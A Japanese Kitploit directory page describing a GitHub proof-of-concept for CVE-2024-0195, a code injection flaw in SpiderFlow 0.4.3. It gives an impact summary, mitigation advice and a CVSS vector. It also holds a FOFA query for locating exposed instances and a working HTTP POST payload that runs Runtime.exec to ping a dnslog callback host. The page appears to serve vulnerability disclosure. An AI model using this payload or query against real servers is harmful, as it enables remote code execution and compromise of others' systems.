Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-0195-SpiderFlow — CVE-2024-0195の概念実証エクスプロイト。SpiderFlow 0.4.3における重大なコードインジェクションの脆弱性で、FunctionService.saveFunctionエンドポイントを介したリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/hack-with-rohit/cve-2024-0195-spiderflow
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubhack-with-rohit/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

CVE-2024-0195の概念実証エクスプロイト。SpiderFlow 0.4.3における重大なコードインジェクションの脆弱性で、FunctionService.saveFunctionエンドポイントを介したリモートコード実行を可能にします。

リポジトリを見る
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-0195 コード生成の不適切な制御('コードインジェクション')重大 2024

概要

CVE-2024-0195 は、spider-flow 0.4.3 Webアプリケーション、具体的には FunctionController.java の FunctionService.saveFunction 関数における重大なコードインジェクションの脆弱性です。攻撃者は、サーバー上で実行される悪意のあるコードをリモートから注入できます。これにより、アプリケーションが完全に侵害される可能性があります。

影響..

この脆弱性は、脆弱な spider-flow アプリケーションをホストしているサーバー上でリモートコード実行が可能になるため、非常に深刻です。攻撃者はサーバーを完全に侵害し、機密データを窃取し、マルウェアや仮想通貨マイナーをインストールし、ネットワーク内部でのさらなる攻撃に利用する可能性があります。アプリケーションとサーバーの機密性、完全性、可用性はすべて重大な影響を受けます。

パッチ

パッチが適用されたバージョンは明示されていないため、現時点ではパッチ適用は選択肢にならないようです。この脆弱性は公に開示され、エクスプロイトが利用可能であるため、直ちに緩和策を講じることが重要です。

緩和策

公式パッチがリリースされるまで、spider-flow 0.4.3 は直ちにオフラインにするか、信頼できるネットワーク/ユーザーのみにアクセスを制限する必要があります。Webアプリケーションファイアウォールやその他の入力検証コントロールを設定して、コードインジェクション攻撃を一時的な緩和策として検出・ブロックできる可能性があります。ただし、これらは完全な解決策ではなく、修正版が利用可能になり次第、脆弱なバージョンをアップグレードする必要があります。

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

エクスプロイト

FOFA : app="spiderflow"

✔ 概念実証

POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
ツールをダウンロード